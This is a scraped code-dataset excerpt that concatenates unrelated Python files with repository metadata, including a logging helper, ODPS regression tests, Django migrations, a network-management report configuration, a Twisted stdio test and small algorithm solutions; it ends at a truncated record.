ekhvedchenya@gmail.com
|
4508094ece806298cf2145b030d29774f438347a
|
e4f8b14cead542586a96bcaa75993b0a29b3c3d0
|
/pyNastran/utils/log.py
|
8b482bf35aacb394dae8997f2100b891fd92ef91
|
[] |
no_license
|
afcarl/cyNastran
|
f1d1ef5f1f7cb05f435eac53b05ff6a0cc95c19b
|
356ee55dd08fdc9880c5ffba47265125cba855c4
|
refs/heads/master
| 2020-03-26T02:09:00.350237
| 2014-08-07T00:00:29
| 2014-08-07T00:00:29
| 144,398,645
| 1
| 0
| null | 2018-08-11T15:56:50
| 2018-08-11T15:56:50
| null |
UTF-8
|
Python
| false
| false
| 5,063
|
py
|
import sys
import platform
import os
def make_log(display=False):
"""
Creates 'pyNastran.log' file with information about working environment,
such as Python version, platform, architecture, etc. Useful for debugging.
    :param display: if True, also print the log information in addition to creating the file
"""
smsg = [("sys.version", sys.version), ("sys.version_info", sys.version_info)]
pmsg = ["machine", "platform", "processor", "architecture", "python_branch",
"python_revision", "win32_ver", "version", "uname", "system",
"python_build", "python_compiler", "python_implementation", "system",
"mac_ver", "linux_distribution", "libc_ver"]
fmt = "%-{0}s = %s\n".format(max(map(len, pmsg + [j[0] for j in smsg])))
msg = "".join([fmt % (i, str(j).replace("\n", "; ")) for (i, j) in smsg])
msg += "".join([fmt % (i, str(getattr(platform, i)())) for i in pmsg])
if display:
print(msg)
    with open('pyNastran.log', 'w') as fil:
        fil.write(msg)
def stderr_logging(typ, msg):
    """
    Default logging function. Takes a text and outputs to stderr.
    :param typ: message type
    :param msg: message to be displayed
    Message will have format 'typ: msg'
    """
    name = '%-8s' % (typ + ':')  # max length of 'INFO', 'DEBUG', 'WARNING', etc.
    sys.stderr.write((name + msg) if typ else msg)
    sys.stderr.flush()
class SimpleLogger(object):
"""
Simple logger object. In future might be changed to use Python logging module.
Two levels are supported: 'debug' and 'info'. Info level discards debug
messages, 'debug' level displays all messages.
.. note:: Logging module is currently not supported because I don't
know how to repoint the log file if the program is called a second
time. Poor logging can result in:\n
1) double logging to a single file\n
          2) all logging going to one file\n
This is really only an issue when calling logging multiple times,
such as in an optimization loop or testing.
"""
def __init__(self, level='debug', log_func=stderr_logging):
"""
:param level: level of logging: 'info' or 'debug'
:param log_func:
            function that will be used to print the log. It should take two
            arguments: the message type and the string produced by the logger.
            Default: print messages to stderr using @see stderr_logging function.
"""
        assert level in ('info', 'debug')
self.level = level
self.log_func = log_func
def properties(self):
"""Return tuple: line number and filename"""
_fr = sys._getframe(3) # jump to get out of the logger code
return (_fr.f_lineno, os.path.basename(_fr.f_globals['__file__']))
def debug(self, msg):
"""
Log DEBUG message
:param msg: message to be logged
"""
if self.level != 'debug':
return
lines = str(msg).split('\n')
self.msg_typ('DEBUG', ''.join([lines[0]] + [' ' * 54 + line + '\n'
for line in lines[1:]]))
def msg_typ(self, typ, msg):
"""
Log message of a given type
:param typ: type of a message (e.g. INFO)
:param msg: message to be logged
"""
n, fn = self.properties()
self.log_func(typ, ' fname=%-25s lineNo=%-4s %s\n' % (fn, n, msg))
    def simple_msg(self, msg, typ=None):
        """
        Log a message directly without any altering.
        :param msg: message to be logged without any alteration.
        """
        self.log_func(typ, msg)
def info(self, msg):
"""
Log INFO message
:param msg: message to be logged
"""
self.msg_typ("INFO", msg)
def warning(self, msg):
"""
Log WARNING message
:param msg: message to be logged
"""
self.msg_typ("WARNING", msg)
def error(self, msg):
"""
Log ERROR message
:param msg: message to be logged
"""
self.msg_typ("ERROR", msg)
def exception(self, msg):
"""
Log EXCEPTION message
:param msg: message to be logged
"""
self.msg_typ("ERROR", msg)
def critical(self, msg):
"""
Log CRITICAL message
:param msg: message to be logged
"""
self.msg_typ("CRITICAL", msg)
def get_logger(log=None, level='debug'):
"""
    This function is useful as it will instantiate a SimpleLogger object if log=None.
:param log: a logger object or None
:param level: level of logging: 'info' or 'debug'
"""
return SimpleLogger(level) if log is None else log
if __name__ == '__main__':
# how to use a simple logger
for nam in ["debug", "info"]:
print('--- %s logger ---' % nam)
test_log = SimpleLogger(nam)
test_log.debug('debug message')
test_log.warning('warning')
test_log.error('errors')
test_log.exception('exception')
make_log(display=True)
|
[
"mesheb82@abe5364a-6225-a519-111c-932ebcde5b3b"
] |
mesheb82@abe5364a-6225-a519-111c-932ebcde5b3b
|
18358ae17ee34ba9ba626dedeb0a03bc901ffec5
|
bc526da042a8d5d2a239989efecb35fd4272e611
|
/odps/ml/regression/tests/test_regression.py
|
674999ee51b95dcb4d72bfbe4ee01d68c24a34df
|
[
"Apache-2.0"
] |
permissive
|
forvendettaw/aliyun-odps-python-sdk
|
595928fff039ae43d2736c53fc27d947def24e35
|
a490a255efd0553cca4454d79ed83b777aae8888
|
refs/heads/master
| 2021-01-12T02:47:31.578957
| 2017-01-05T03:05:06
| 2017-01-05T03:05:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,191
|
py
|
# encoding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
from odps.df import DataFrame
from odps.config import options
from odps.ml.utils import TEMP_TABLE_PREFIX
from odps.ml.regression import *
from odps.ml.feature import *
from odps.ml.statistics import *
from odps.ml.tests.base import MLTestBase, tn, otm, ci_skip_case
from odps.ml.metrics import *
import logging
logger = logging.getLogger(__name__)
IONOSPHERE_TABLE = tn('pyodps_test_ml_ionosphere')
XGBOOST_OUT_TABLE = tn('pyodps_test_xgboost_out')
GBDT_OUT_TABLE = tn('pyodps_test_gbdt_out')
LINEAR_REGRESSION_OUT_TABLE = tn('pyodps_test_linear_reg_out')
LINEAR_SVR_OUT_TABLE = tn('pyodps_test_linear_svr_out')
LASSO_OUT_TABLE = tn('pyodps_test_lasso_out')
RIDGE_OUT_TABLE = tn('pyodps_test_ridge_out')
MODEL_NAME = tn('pyodps_test_out_model')
class TestMLRegression(MLTestBase):
def setUp(self):
super(TestMLRegression, self).setUp()
self.create_ionosphere(IONOSPHERE_TABLE)
options.runner.dry_run = True
def test_mock_xgboost(self):
df = DataFrame(self.odps.get_table(IONOSPHERE_TABLE)).roles(label='class')
splited = df.split(0.6)
xgboost = Xgboost()
model = xgboost.train(splited[0])._add_case(self.gen_check_params_case({
'labelColName': 'class', 'modelName': MODEL_NAME, 'colsample_bytree': '1', 'silent': '1',
'eval_metric': 'error', 'eta': '0.3', 'inputTableName': TEMP_TABLE_PREFIX + '0_split_2_1', 'max_delta_step': '0',
'base_score': '0.5', 'seed': '0', 'min_child_weight': '1', 'objective': 'reg:linear',
'featureColNames': ','.join('a%02d' % i for i in range(1, 35)),
'max_depth': '6', 'gamma': '0', 'booster': 'gbtree'}))
model.persist(MODEL_NAME)
predicted = model.predict(splited[1])._add_case(self.gen_check_params_case({
'modelName': MODEL_NAME, 'appendColNames': ','.join('a%02d' % i for i in range(1, 35)) + ',class',
'outputTableName': XGBOOST_OUT_TABLE, 'inputTableName': TEMP_TABLE_PREFIX + '0_split_2_2'}))
# persist is an operational node which will trigger execution of the flow
predicted.persist(XGBOOST_OUT_TABLE)
def test_mock_gbdt(self):
df = DataFrame(self.odps.get_table(IONOSPHERE_TABLE)).roles(label='class')
splited = df.split(0.6)
gbdt = GBDT(min_leaf_sample_count=10)
model = gbdt.train(splited[0])._add_case(self.gen_check_params_case({
'tau': '0.6', 'modelName': MODEL_NAME, 'inputTableName': TEMP_TABLE_PREFIX + '0_split_2_1', 'maxLeafCount': '32',
'shrinkage': '0.05', 'featureSplitValueMaxSize': '500', 'featureRatio': '0.6', 'testRatio': '0.0',
'newtonStep': '0', 'randSeed': '0', 'sampleRatio': '0.6', 'p': '1', 'treeCount': '500', 'metricType': '2',
'labelColName': 'class', 'featureColNames': ','.join('a%02d' % i for i in range(1, 35)),
'minLeafSampleCount': '10', 'lossType': '3', 'maxDepth': '11'}))
model.persist(MODEL_NAME)
predicted = model.predict(splited[1])._add_case(self.gen_check_params_case({
'modelName': MODEL_NAME, 'appendColNames': ','.join('a%02d' % i for i in range(1, 35)) + ',class',
'outputTableName': GBDT_OUT_TABLE, 'inputTableName': TEMP_TABLE_PREFIX + '0_split_2_2'}))
# persist is an operational node which will trigger execution of the flow
predicted.persist(GBDT_OUT_TABLE)
@ci_skip_case
def test_linear(self):
options.runner.dry_run = False
self.delete_table(LINEAR_REGRESSION_OUT_TABLE)
self.delete_offline_model(MODEL_NAME)
df = DataFrame(self.odps.get_table(IONOSPHERE_TABLE)).roles(label='class')
splited = df.split(0.6)
algo = LinearRegression()
model = algo.train(splited[0])
model.persist(MODEL_NAME)
        logging.info('Importance: %s', regression_importance(splited[1], model))
predicted = model.predict(splited[1])
# persist is an operational node which will trigger execution of the flow
predicted.persist(LINEAR_REGRESSION_OUT_TABLE)
        logging.info('MSE: %s', mean_squared_error(predicted, 'class'))
        logging.info('MAE: %s', mean_absolute_error(predicted, 'class'))
        logging.info('HIST: %s', residual_histogram(predicted, 'class'))
        logging.info('Pearson: %s', pearson(predicted, col1='class'))
|
[
"xuye.qin@alibaba-inc.com"
] |
xuye.qin@alibaba-inc.com
|
560210583dcd9e410b9a6d3ce7eccb94b910daaf
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_1_neat/16_0_1_ashuwp_A.py
|
2b4922b913d674d05b48e7ff31fca4b01cb5237e
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 441
|
py
|
def sheep(num):
    # count by num until every decimal digit 0-9 has appeared in some
    # multiple; 0b1111111111 == 1023 means all ten digit-bits are set
    if num == 0:
        return "INSOMNIA"
    itr = tr = 0
    while tr != 1023:
        cnt = 0
        itr += 1
        temp = str(num * itr)
        for k in temp:
            cnt |= 1 << int(k)  # set the bit for digit k
        tr |= cnt
    return num * itr
if __name__ == "__main__":
tc = int(input())
for i in range(tc):
n = int(input())
print("Case #{}: {}".format(i + 1, sheep(n)))
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
3aa435659cdd66419cc6a2c5579e721ad5ecf45d
|
4b3ae6048ced0d7f88a585af29fa3a7b15005749
|
/Python/Django/AJAX/user_login/apps/orm_app/migrations/0001_initial.py
|
fed103cb60fdb32297924849629a3e26c80f3a0a
|
[] |
no_license
|
ajag408/DojoAssignments
|
a6320856466ac21d38e8387bdcbbe2a02009e418
|
03baa0ff5261aee6ffedf724657b3a8c7cdffe47
|
refs/heads/master
| 2022-12-11T15:50:46.839881
| 2021-06-07T20:57:17
| 2021-06-07T20:57:17
| 79,872,914
| 0
| 0
| null | 2022-12-08T00:35:09
| 2017-01-24T02:58:15
|
Python
|
UTF-8
|
Python
| false
| false
| 877
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-07-25 03:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('email_address', models.CharField(max_length=255)),
('age', models.IntegerField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"akashjagannathan408@gmail.com"
] |
akashjagannathan408@gmail.com
|
a8785d9e209ad0d74353f91f65a34d7c4e5ab111
|
3e45ea5b84fdce1d1c391929e6e95c5ecbfdbf98
|
/day03/app03_1/migrations/0005_animal_cat_dog.py
|
293a57087d20852f2a63c1505c8803080066aa6e
|
[
"Apache-2.0"
] |
permissive
|
General-Coder/Django-Introduction
|
3cc75bc2098a0f90769d375aeee8f999a4f6fcc6
|
e88b12682f9abc46a90a0fc79e7443537230a506
|
refs/heads/master
| 2020-04-05T07:34:44.540644
| 2018-11-11T14:30:12
| 2018-11-11T14:30:12
| 156,681,232
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,630
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-10-24 16:46
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app03_1', '0004_teacher_xz'),
]
operations = [
migrations.CreateModel(
name='Animal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('color', models.CharField(max_length=30)),
('gender', models.CharField(max_length=30)),
('age', models.IntegerField()),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Cat',
fields=[
('animal_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='app03_1.Animal')),
('type', models.CharField(max_length=20)),
],
bases=('app03_1.animal',),
),
migrations.CreateModel(
name='Dog',
fields=[
('animal_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='app03_1.Animal')),
('size', models.CharField(max_length=20)),
],
bases=('app03_1.animal',),
),
]
|
[
"17625904460@163.com"
] |
17625904460@163.com
|
dff4df7f2b57a2ea5b48b4b41f6928afa2de7294
|
3a9f2b3d79cf214704829427ee280f4b49dca70a
|
/saigon/rat/u/fm/_report_mgmt_cfg.py
|
031da9c2287b3c40022bf4816bc7505478d10035
|
[] |
no_license
|
jichunwei/MyGitHub-1
|
ae0c1461fe0a337ef459da7c0d24d4cf8d4a4791
|
f826fc89a030c6c4e08052d2d43af0b1b4b410e3
|
refs/heads/master
| 2021-01-21T10:19:22.900905
| 2016-08-20T03:34:52
| 2016-08-20T03:34:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,184
|
py
|
'''
This tea works with the Reports page.
1. Reports foundation development
+ to cover those pages: Device View, Active Firmware, Historical
Connectivity, Association, Provision, Events, Speed Flex
+ to provide basic report activities:
+ fill in report options (inc. filters)
+ generate the report
+ get the report results
+ unsupported features: save reports, export reports
Examples to generate report:
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=dv_report_zd_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=dv_report_ap_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=connectivity_report_zd_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=connectivity_report_ap_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=provision_report_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=events_report_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=speed_flex_report_params
Examples to create report:
Example for report option and filter options
save_cfg = dict(include_filter = True, # False
include_header = True, # False
schedule = True, # False
frequency = 'Weekly', # | 'Weekly' | 'Monthly',
day_of_week = 'Monday',
time_of_day = '3:00', # '2:00', '3:00', ...
am_pm = 'PM', # 'PM'
email_report = 'admin@ruckus.com',
)
advance_cfg = dict(include_filter = True, # False
include_header = True, # False
schedule = True, # False
frequency = 'Monthly', # | 'Weekly' | 'Monthly',
day_of_month = 1,
time_of_day = '3:00', # '2:00', '3:00', ...
am_pm = 'AM', # 'PM'
email_report = 'admin@ruckus.com',
)
'''
import copy
#-------------------------------------------------------------------------------
# It is too long to write these params and their values on command line.
# So define them here for generating/creating reports.
general_save_cfg = dict(
include_filter = True,
include_header = True,
time_of_day = '6:00', # '2:00', '3:00', ...
am_pm = 'AM', # 'PM'
email_report = 'admin@ruckus.com',
)
save_cfg_daily_type = dict(
schedule = True,
frequency = 'Daily', # | 'Weekly' | 'Monthly',
)
save_cfg_daily_type.update(general_save_cfg)
save_cfg_weekly_type = dict(
schedule = True, # False
frequency = 'Weekly', # | 'Weekly' | 'Monthly',
day_of_week = 'Monday',
)
save_cfg_weekly_type.update(general_save_cfg)
save_cfg_monthly_type = dict(
schedule = True, # False
frequency = 'Monthly', # | 'Weekly' | 'Monthly',
day_of_month = 1,
)
save_cfg_monthly_type.update(general_save_cfg)
################################################################################
# NOTE: Currently cannot generate/create reports with the filters "Model Name"
# and "Connection". Bug: 15203
################################################################################

# 1. Params to generate a report and get its result from Report Categories
dv_report_zd_params = dict(
    #action = 'generate',
    report_type = 'device_view',
    get_result = True,
    report_options = [
        'All ZoneDirectors', 'ZoneDirectors',
    ],
    filter_options = [
        ['ZoneDirector Name', 'Contains', 'Ruckus'],
        ['Version', 'Contains', '9.0']
    ],
    save_cfg = save_cfg_daily_type,
)

# Params to create/generate the ZD Device View report from Saved Reports
manage_dv_report_zd_params = copy.deepcopy(dv_report_zd_params)
manage_dv_report_zd_params.update(
    report_options = [
        'Device View', 'All ZoneDirectors', 'ZoneDirectors',
    ],
)

dv_report_ap_params = dict(
    #action = 'generate',
    report_type = 'device_view',
    get_result = True,
    report_options = [
        'All Standalone APs', 'Currently Connected',
    ],
    filter_options = [
        ['Device Name', 'Contains', 'Ruckus'],
        ['Uptime', 'Greater than', '1', 'Hours']
    ],
    save_cfg = save_cfg_weekly_type,
)

# Params to create/generate the AP Device View report from Saved Reports
manage_dv_report_ap_params = copy.deepcopy(dv_report_ap_params)
manage_dv_report_ap_params.update(
    report_options = [
        'Device View', 'All Standalone APs', 'Currently Connected',
    ],
)

connectivity_report_zd_params = dict(
    #action = 'generate',
    report_type = 'connectivity',
    get_result = True,
    report_options = [
        'All ZoneDirectors', 'Disconnected ZoneDirectors', # 'Connected ZoneDirectors',
    ],
    filter_options = [
        ['Device Last Seen', 'Earlier than', '2010-07-26', '06:00:00 AM'],
    ],
    save_cfg = save_cfg_monthly_type,
)

manage_connectivity_report_zd_params = copy.deepcopy(connectivity_report_zd_params)
manage_connectivity_report_zd_params.update(
    report_options = [
        'Historical Connectivity', 'All ZoneDirectors', 'Disconnected ZoneDirectors',
    ],
)

connectivity_report_ap_params = dict(
    #action = 'generate',
    report_type = 'connectivity',
    get_result = True,
    report_options = [
        'All Standalone APs', 'Connected',
    ],
    filter_options = [
        ['Uptime', 'Greater than', 5, 'Hours'],
        ['Software', 'Contains', '9.0']
    ],
    save_cfg = save_cfg_daily_type,
)

manage_connectivity_report_ap_params = copy.deepcopy(connectivity_report_ap_params)
manage_connectivity_report_ap_params.update(
    report_options = [
        'Historical Connectivity', 'All Standalone APs', 'Connected',
    ],
)

# Report params for the Provision report
provision_report_params = dict(
    #action = 'generate',
    report_type = 'provision',
    get_result = True,
    report_options = [
        'Configuration Upgrade',
    ],
    filter_options = [
        ['Created by', 'Starts with', 'admin'],
    ],
    save_cfg = save_cfg_weekly_type,
)

manage_provision_report_params = copy.deepcopy(provision_report_params)
manage_provision_report_params.update(
    report_options = [
        'Provision', 'Configuration Upgrade',
    ],
)

# Report params for the Events report
events_report_params = dict(
    #action = 'generate',
    report_type = 'events',
    get_result = True,
    report_options = [
        'Events', 'Standalone APs',
        'Value changed due to configuration request'
    ],
    filter_options = [
        ['IP Address', 'Starts with', '192.168']
    ],
    save_cfg = save_cfg_monthly_type,
)

manage_events_report_params = copy.deepcopy(events_report_params)
manage_events_report_params.update(
    report_options = [
        'Events', 'Events', 'Standalone APs',
        'Value changed due to configuration request'
    ],
)

# Report params for the Speed Flex report
speed_flex_report_params = dict(
    #action = 'generate',
    report_type = 'speed_flex',
    get_result = True,
    report_options = None,
    filter_options = [
        ['Executor', 'Starts with', 'admin']
    ],
    save_cfg = save_cfg_daily_type,
)

manage_speed_flex_report_params = copy.deepcopy(speed_flex_report_params)
manage_speed_flex_report_params.update(
    report_options = [
        'Speed Flex',
    ],
)
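
# ------------------------------------------------------------------
# Illustrative sketch only (not part of the original test config): one way a
# harness might consume these dicts. The helper name `generate_report` and
# its keyword interface are assumptions for illustration, not the real API.
#
#   def run_device_view_report(flexmaster):
#       cfg = copy.deepcopy(dv_report_zd_params)
#       return flexmaster.generate_report(**cfg)   # hypothetical method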
|
[
"tan@xx.com"
] |
tan@xx.com
|
96aa5a1461e19e2949d8c3ae4a84b8a9c7751ff7
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02255/s769034459.py
|
6f0767f2d12bd0d4ef95fa9cd88e9316da5284d9
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 587
|
py
|
import sys


def insert_sort(array):
    # Insertion sort that prints the array after every outer-loop step,
    # matching the judge's expected output format.
    for i in range(len(array)):
        v = array[i]
        j = i - 1
        while (j >= 0) and (array[j] > v):
            array[j + 1] = array[j]
            j -= 1
        array[j + 1] = v
        print(print_list(array))    # Python 3 print; the original used the Python 2 statement


def print_list(array):
    return " ".join(str(n) for n in array)


if __name__ == "__main__":
    array_num = int(sys.stdin.readline().strip())    # element count (not otherwise used)
    array = [int(x) for x in sys.stdin.readline().strip().split(" ")]
    array = insert_sort(array)
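
# Example run (computed by hand): given the input
#   6
#   5 2 4 6 1 3
# the program prints the array after each outer-loop step:
#   5 2 4 6 1 3
#   2 5 4 6 1 3
#   2 4 5 6 1 3
#   2 4 5 6 1 3
#   1 2 4 5 6 3
#   1 2 3 4 5 6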
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
9621f6de9e603b381c794751a9e39256ceb86e62
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_intermarrying.py
|
448779925828137d3486fd5f49c4d3a4f0523579
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
# class header
class _INTERMARRYING():
    def __init__(self):
        self.name = "INTERMARRYING"
        # The original assigned the bare name `intermarry`, which is undefined;
        # a list holding the base form is assumed here.
        self.definitions = ['intermarry']
        self.parents = []
        self.children = []   # original had the typo `childen`
        self.properties = []
        self.jsondata = {}
        self.basic = ['intermarry']
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
f3d200f5ad3c364311c5a8d6f245b9b7602b099e
|
31009efe0b3882551f03dcaa9c71756c7c6f6ede
|
/src/main/resources/twisted/test/stdio_test_loseconn.py
|
7f95a016b4a41e7ef1c45723dd2ebd0778ee341e
|
[
"Apache-2.0",
"ZPL-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
riyafa/autobahntestsuite-maven-plugin
|
b533433c75f7daea2757158de54c6d80d304a962
|
737e6dad2d3ef794f30f0a2013a77e28decd2ec4
|
refs/heads/master
| 2020-08-16T13:31:39.349124
| 2019-10-16T09:20:55
| 2019-10-16T09:20:55
| 215,506,990
| 0
| 0
|
Apache-2.0
| 2019-10-16T09:18:34
| 2019-10-16T09:18:34
| null |
UTF-8
|
Python
| false
| false
| 1,514
|
py
|
# -*- test-case-name: twisted.test.test_stdio.StandardInputOutputTestCase.test_loseConnection -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Main program for the child process run by
L{twisted.test.test_stdio.StandardInputOutputTestCase.test_loseConnection} to
test that ITransport.loseConnection() works for process transports.
"""

import sys, _preamble

from twisted.internet.error import ConnectionDone
from twisted.internet import stdio, protocol
from twisted.python import reflect, log


class LoseConnChild(protocol.Protocol):
    exitCode = 0

    def connectionMade(self):
        self.transport.loseConnection()

    def connectionLost(self, reason):
        """
        Check that C{reason} is a L{Failure} wrapping a L{ConnectionDone}
        instance and stop the reactor. If C{reason} is wrong for some reason,
        log something about that in C{self.errorLogFile} and make sure the
        process exits with a non-zero status.
        """
        try:
            try:
                reason.trap(ConnectionDone)
            except:
                log.err(None, "Problem with reason passed to connectionLost")
                self.exitCode = 1
        finally:
            reactor.stop()


if __name__ == '__main__':
    reflect.namedAny(sys.argv[1]).install()
    log.startLogging(file(sys.argv[2], 'w'))
    from twisted.internet import reactor
    protocol = LoseConnChild()
    stdio.StandardIO(protocol)
    reactor.run()
    sys.exit(protocol.exitCode)
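
# ------------------------------------------------------------------
# Context note (not part of the original file), inferred from the code
# above: the parent test case spawns this script as a child process,
# passing the reactor installer to load as argv[1] and a log-file path
# as argv[2]; the child's exit code tells the test whether
# connectionLost received a ConnectionDone failure.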
|
[
"nmaurer@redhat.com"
] |
nmaurer@redhat.com
|
3453ef9fb376dd038b165acdf01d35326cba96a5
|
ae8590dc2dd0dd6530868ccd52702d06e5d96fa1
|
/copy of source code.py
|
b5a8ca45a3da63b6f0813916fd6af3bbdc1b8dd5
|
[] |
no_license
|
abhisek08/Python-Basics-Part-1-
|
e3bec8e4d7f9e484c4bcade7763842334c93f4b0
|
3687dd6ebb01f2289b3fa226cea28b564894a68f
|
refs/heads/master
| 2022-09-08T11:42:28.871012
| 2020-05-25T07:58:01
| 2020-05-25T07:58:01
| 266,717,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
'''
Write a Python program to create a copy of its own source code.
'''
print()
print((lambda str='print(lambda str=%r: (str %% str))()': (str % str))())
print()
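
# How the trick works (explanatory note, not part of the original snippet):
# the lambda's default argument is a template string; `str % str` substitutes
# the template's own repr() into %r and collapses %% to %, so the printed
# line reproduces (up to the outer parentheses) the statement that produced it.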
|
[
"abhisek.bhunia08@gmail.com"
] |
abhisek.bhunia08@gmail.com
|
6271957d52b5f94a002352d4446b733e556860f3
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03060/s903224060.py
|
f50e8567bb440e68db273f2b40d0b0d865cac43a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 461
|
py
|
import sys
sys.setrecursionlimit(10**6)
n = int(input())
v = list(map(int, input().split()))
c = list(map(int, input().split()))
#n, m = map(int, input().split())
#s = input()
#s,t = input().split()
#a = [int(input()) for _ in range(n)]
#
#readline = sys.stdin.readline
#n,m = [int(i) for i in readline().split()]
#ab = [[int(i) for i in readline().split()] for _ in range(n)]
ans = 0
for i, j in zip(v, c):
    if i > j:
        ans += i - j
print(ans)
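
# Worked example: for v = [10, 2, 5] and c = [6, 3, 4], only items whose
# value exceeds their cost contribute: (10 - 6) + (5 - 4) = 5, so ans = 5.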
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
2558d70cd897e6f36debd3e0e01e05c3f02cf98a
|
5b9b1139848db270f5987d4d539c39a30115e87b
|
/solutions/inod.py
|
be970934ef14c54ddf4e4fd8782a9c1426f94dc3
|
[] |
no_license
|
mady1258/Bioinformatics_Stronghold
|
3d0f82b3cff0066246eb6641368a4ea4fe366362
|
6c7daf1ea92b2a74657c9ce40a19d356177d983e
|
refs/heads/master
| 2023-02-04T14:00:54.985085
| 2020-12-23T11:32:03
| 2020-12-23T11:32:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
import sys

if __name__ == "__main__":
    '''
    Given: A positive integer n (3≤n≤10000).
    Return: The number of internal nodes of any unrooted binary tree having n leaves.
    '''
    n = int(sys.stdin.readline().rstrip())
    # An unrooted binary tree with n leaves has some number m of internal
    # nodes, each of degree 3, while every leaf has degree 1, so the total
    # degree is n + 3m. A tree on n + m nodes has n + m - 1 edges, and by the
    # handshake lemma the total degree is twice the edge count:
    #   (n + 3m) / 2 = n + m - 1  =>  m = n - 2
    # Sanity check: n = 4 leaves gives m = 2 internal nodes.
    print(n - 2)
|
[
"egeulgen@gmail.com"
] |
egeulgen@gmail.com
|
533f6ecce51b82f53b872fc88c7b8e9ebcf7864b
|
fb2cc597f319380d228fc15c4008760a82203687
|
/var/spack/repos/builtin/packages/e3sm-kernels/package.py
|
2e8534ee60c1371305fb8b850092d450a78a511f
|
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"LGPL-2.1-only"
] |
permissive
|
JayjeetAtGithub/spack
|
c41b5debcbe139abb2eab626210505b7f930d637
|
6c2df00443a2cd092446c7d84431ae37e64e4296
|
refs/heads/develop
| 2023-03-21T02:35:58.391230
| 2022-10-08T22:57:45
| 2022-10-08T22:57:45
| 205,764,532
| 0
| 0
|
MIT
| 2019-09-02T02:44:48
| 2019-09-02T02:44:47
| null |
UTF-8
